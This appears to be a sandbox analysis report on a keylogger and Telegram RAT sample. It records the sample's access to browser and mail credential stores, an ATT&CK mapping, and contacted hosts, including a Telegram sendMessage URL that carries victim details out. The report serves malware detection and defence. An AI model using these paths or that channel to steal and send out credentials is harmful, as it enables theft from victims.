        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected Snake Keylogger
        Source: Yara matchFile source: 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Yara detected Telegram RAT
        Source: Yara matchFile source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8376, type: MEMORYSTR
        Yara detected VIP Keylogger
        Source: Yara matchFile source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8376, type: MEMORYSTR
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\SysWOW64\svchost.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
        Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: Yara matchFile source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33970405843.000000000580D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8376, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected Snake Keylogger
        Source: Yara matchFile source: 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Yara detected Telegram RAT
        Source: Yara matchFile source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8376, type: MEMORYSTR
        Yara detected VIP Keylogger
        Source: Yara matchFile source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8376, type: MEMORYSTR

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        PowerShell        		1
        LSASS Driver        		312
        Process Injection        		1
        Masquerading        		1
        OS Credential Dumping        		21
        Security Software Discovery        		Remote Services1
        Email Collection        		1
        Web Service        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        DLL Side-Loading        		1
        LSASS Driver        		1
        Disable or Modify Tools        		LSASS Memory2
        Process Discovery        		Remote Desktop Protocol1
        Data from Local System        		1
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        DLL Side-Loading        		31
        Virtualization/Sandbox Evasion        		Security Account Manager31
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared Drive3
        Ingress Tool Transfer        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture3
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading        		LSA Secrets1
        System Network Configuration Discovery        		SSHKeylogging14
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials113
        System Information Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1541369 Sample: g1TLK7mbZD.img Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 25 reallyfreegeoip.org 2->25 27 api.telegram.org 2->27 29 2 other IPs or domains 2->29 37 Malicious sample detected (through community Yara rule) 2->37 39 Multi AV Scanner detection for submitted file 2->39 41 Yara detected VIP Keylogger 2->41 47 4 other signatures 2->47 7 9236-pagaconferma-jpg.exe 1 2->7         started        10 cmd.exe 2 2->10         started        12 udfs.sys 2->12         started        signatures3 43 Tries to detect the country of the analysis system (by using the IP) 25->43 45 Uses the Telegram API (likely for C&C communication) 27->45 process4 signatures5 49 Multi AV Scanner detection for dropped file 7->49 51 Machine Learning detection for dropped file 7->51 53 Writes to foreign memory regions 7->53 55 2 other signatures 7->55 14 svchost.exe 15 2 7->14         started        18 powershell.exe 41 10->18         started        21 conhost.exe 10->21         started        process6 dnsIp7 31 api.telegram.org 149.154.167.220, 443, 49807 TELEGRAMRU United Kingdom 14->31 33 checkip.dyndns.com 158.101.44.242, 49790, 49793, 49795 ORACLE-BMC-31898US United States 14->33 35 reallyfreegeoip.org 104.21.67.152, 443, 49791, 49792 CLOUDFLARENETUS United States 14->35 57 System process connects to network (likely due to code injection or exploit) 14->57 59 Tries to steal Mail credentials (via file / registry access) 14->59 61 Tries to harvest and steal browser information (history, passwords, etc) 14->61 23 \Device\CdRom0\9236-pagaconferma-jpg.exe, PE32 18->23 dropped 63 Loading BitLocker PowerShell Module 18->63 65 Powershell drops PE file 18->65 file8 signatures9

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        g1TLK7mbZD.img32%ReversingLabsScript-AutoIt.Trojan.ZmutzyPong

        Dropped Files

        SourceDetectionScannerLabelLink
        \Device\CdRom0\9236-pagaconferma-jpg.exe100%Joe Sandbox ML
        \Device\CdRom0\9236-pagaconferma-jpg.exe18%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        reallyfreegeoip.org
        		104.21.67.152
        		truetrue
          		unknown
          api.telegram.org
          		149.154.167.220
          		truetrue
            		unknown
            checkip.dyndns.com
            		158.101.44.242
            		truetrue
              		unknown
              checkip.dyndns.org
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://reallyfreegeoip.org/xml/154.16.192.225true
                  		unknown
                  https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20and%20Time:%2024/10/2024%20/%2020:04:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20364339%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dtrue
                    		unknown
                    http://checkip.dyndns.org/true
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabsvchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmpfalse
                        		unknown
                        https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrowsvchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
